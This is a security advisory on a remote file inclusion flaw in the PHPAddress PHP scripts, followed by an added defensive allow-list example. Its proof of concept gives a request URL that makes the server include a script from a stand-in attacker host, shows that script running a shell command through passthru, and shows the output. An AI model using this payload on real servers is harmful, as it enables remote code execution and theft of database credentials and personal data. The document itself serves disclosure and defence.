PHP source injection in PHPAddress

Description

PHP-Address is a collection of PHP3 scripts (works on PHP4 too) for maintaining a small web-based address database. It can be found at http://phpaddress.huebsch-gemacht.de/

Workaround

Change the global.php3 file so it looks like this:

------------global.php3------------
<?php
# (c) Copyright in 2000, 2001 by Chris Huebsch (chu@informatik.tu-chemnitz.de)
$LangCookie = ""; // THIS LINE: reset the variable so a request parameter cannot set it
if ($LangCookie) require("$LangCookie.php3"); // Line 5
...
-----------------------------------

Tested version

PHP Address 0.2e (09.12.2001)

The Problem

Any user who requests a URL like "http://SERVER/globals.php3?LangCookie=INCLUDE_FILE" is able to include any file he wants.

Example

I put a PHP script on my server which I wanted to include:

------------x.php3------------
<? passthru("/bin/ls /"); ?>
-------------------------------

Then I requested this URL:

http://SERVER/globals.php3?LangCookie=http://MYSERVER/x

(the .php3 is already there, look at line 5 in global.php3)

------------output------------
bin boot dev etc home initrd lib lost+found mnt opt proc root sbin swap tmp usr var
------------------------------

Note that any PHP code could be included; malicious users could get access to database passwords, personal information, ...

------------------------------
Tim Vandermeersch
Tim.Vandermeersch@pandora.be
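
The workaround above closes the hole by emptying $LangCookie before it is used. The following is an added example, not PHPAddress code and not from the advisory's author, showing a way to keep a language selection while never letting the request value reach require(); the language codes, the lang/ directory and the function name lang_file are assumptions made for illustration.

```php
<?php
// Added example, not PHPAddress code. The language codes, the lang/
// directory and the helper name are hypothetical.

const ALLOWED_LANGS = ['en', 'de', 'fr'];   // assumed set of shipped translations
const DEFAULT_LANG  = 'en';

/**
 * Map an untrusted language value to a file that ships with the application.
 * Anything that is not an exact allow-list match (URLs, paths, arrays, empty
 * values) falls back to the default language.
 */
function lang_file($requested, string $langDir): string
{
    $lang = DEFAULT_LANG;
    if (is_string($requested) && in_array($requested, ALLOWED_LANGS, true)) {
        $lang = $requested;
    }
    // The path is built only from constants in this file, never from the request.
    return $langDir . '/' . $lang . '.php3';
}

// Constructed inputs: one legitimate value, then the kinds of value the
// advisory describes, plus an array as a malformed cookie could deliver.
$samples = ['de', 'http://MYSERVER/x', '../../etc/passwd', '', null, ['de']];
foreach ($samples as $value) {
    printf("%-28s -> %s\n", json_encode($value), lang_file($value, __DIR__ . '/lang'));
}

// In the application, read the value from the cookie only, not from a global
// variable that the query string can populate:
// require lang_file($_COOKIE['LangCookie'] ?? null, __DIR__ . '/lang');
```

Disabling allow_url_include (allow_url_fopen on PHP 4) in php.ini stops the remote-URL form of the request but not inclusion of local files, so the allow-list is still needed.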